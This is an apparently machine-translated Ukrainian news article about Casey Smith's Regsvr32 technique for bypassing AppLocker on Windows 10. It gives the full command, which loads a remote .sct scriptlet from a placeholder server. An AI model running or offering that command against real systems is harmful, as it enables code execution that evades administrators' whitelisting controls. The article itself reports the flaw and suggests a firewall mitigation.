Дослідник з Колорадо, який походить за прізвищем, Кейсі Сміт, з'ясував, що Regsvr32 можна використовувати для обходу AppLocker в Windows 10, і це велика проблема для користувачів комп'ютерів, особливо тих, хто в бізнес-середовищі.

AppLocker вперше був представлений у Windows 7 та Windows Server 2008 R2. Він розроблений, щоб адміністратори могли вказати, яка група чи користувачі можуть скористатися деякими або всіма програмами на основі унікальної ідентичності файлів. Якщо ви людина, яка схильна використовувати AppLocker, то слід загальновідомо, що це може бути використано для створення певних правил, що дозволяють програмам запускати або зупиняти їх у своїх слідах.

Для тих, хто може не знати, Regvr32 може використовуватися для реєстрації та відреєстрації DLL-файлів. Це не інструмент одним клацанням, оскільки це утиліта командного рядка, тому лише досвідчені користувачі комп'ютерів повинні прагнути скористатися тим, що він може запропонувати.

Ми розуміємо, що за допомогою цієї методики це не змінює реєстр комп'ютерної системи, що ускладнює адміністраторам знати, чи були внесені якісь зміни.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"Дивовижне тут полягає в тому, що regsvr32 вже відомий проксі, використовує TLS, слідкує за переадресаціями тощо. І … Ви здогадалися про підписаний, за замовчуванням MS двійковий код. Отже, все, що вам потрібно зробити, - це розмістити файл your.sct у тому місці, яке ви контролюєте », - написав Сміт.

Вищеописана методика не потребує адміністративних привілеїв і не змінює реєстр. Крім того, сценарії можуть бути викликані як через HTTP, так і HTTPS. На даний момент Microsoft не випустила патч для цієї маленької проблеми, тому єдиний варіант на даний момент - блокувати Regsvr32 через брандмауер Windows.

Цікаво, що програмний гігант ще не відповів на питання безпеки, що стоять перед його операційною системою. Тепер, коли він знаходиться під відкритим небом, ми очікуємо, що почуємо щось від компанії разом із розмовами про майбутній патч.